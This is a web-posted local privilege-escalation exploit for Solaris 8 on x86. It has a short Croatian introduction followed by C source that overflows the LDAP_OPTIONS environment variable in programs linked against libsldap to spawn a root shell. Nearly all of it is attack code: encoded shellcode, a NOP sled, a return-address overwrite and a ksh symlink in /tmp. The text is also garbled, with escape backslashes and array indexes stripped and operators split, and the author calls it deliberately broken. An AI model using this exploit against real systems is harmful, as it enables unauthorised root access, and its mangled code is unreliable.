solaris (i386) 8 libsldap exploit
Inace svoje exploite drzim za sebe ali ovoga sam udlucio releasati.
http://anti.security.is
Napisao sam i exploit za SPARC pa koga zanima neka me maila.
/*
* Local Solaris 8 (x86) libsldap Exploit
* by slash <[email protected]>
*
* argv[1] can be passwd, yppasswd, nispasswd, sendmail
* chkey etc. Use the ldd command to find more programs
* that are linked agains libsldap library. Maybee it would
* be a good idea to play with the overflow egg by changing
* the buffer size or RETPOS.
*
* Word up to Adam Beyer, Cris Liebing and Gayle San that
* played @ Rotor 2001 - Experience
*
* PRIVATE !!! DO NOT DISTRIBUTE !!! PRIVATE !!!
*
* *note* slightly broken for public
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define SIZE 331
#define NOP 0x90
#define RETPOS 251
#define ENV "LDAP_OPTIONS"
char shellcode[] =
"xebx1cx5ex33xc0x33xdbxb3x08xfexc3x2bxf3x88x06"
"x6ax06x50xb0x88x9axffxffxffxffx07xeexebx06x90"
"xe8xdfxffxffxffx55x8bxecx83xecx08xebx5dx33xc0"
"xb0x3axfexc0xebx16xc3x33xc0x40xebx10xc3x5ex33"
"xdbx89x5ex01xc6x46x05x07x88x7ex06xebx05xe8xec"
"xffxffxffx9axffxffxffxffx0fx0fxc3x5ex33xc0x89"
"x76x08x88x46x07x33xd2xb2x06x02xd2x89x04x16x50"
"x8dx46x08x50x8bx46x08x50xe8xb5xffxffxffx33xd2"
"xb2x06x02xd2x03xe2x6ax01xe8xafxffxffxffx83xc4"
"x04xe8xc9xffxffxffx2fx74x6dx70x2fx78x78";
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
int main (int argc, char *argv[])
{
char buffer[SIZE];
char *program;
int i, offset;
unsigned long ret;
if (argc < 2) {
printf ("Usage: %s </path/to/program> <offset> <ret>n", argv[0]);
}
printf ("Local Solaris 8 (x86) libsldap Exploitn");
printf ("by slash <[email protected]>nn");
offset = atoi(argv[2]);
program = atoi(argv[1]);
if (argc < 3)
{
ret = get_sp();
} else
{
ret = argv[3];
//sanity cheq
if(!(ret & 0xff) | | !(ret & 0xff00) | |
!(ret & 0xff0000) | | !(ret & 0xff000000))
{
printf("Your return address contains a zero-byte !");
exit(EXIT_FAILURE);
}
}
for (i = 0; i < 250 - strlen(shellcode); i++) {
*buffer = NOP;
}
for (i = 250 - strlen(shellcode); i < 250; i++) {
*buffer = shellcode;
}
for (i = RETPOS; i < SIZE; i = i + 4) {
*(long *)&buffer = ret + offset;
}
printf ("Offset [%d] - Return Address [0x%x]n", offset, ret + offset);
system ("/bin/ln -s /bin/ksh /tmp/xx");
setenv (ENV, buffer, 1);
execl (program, "1337", 0);
}
 |  |
 |
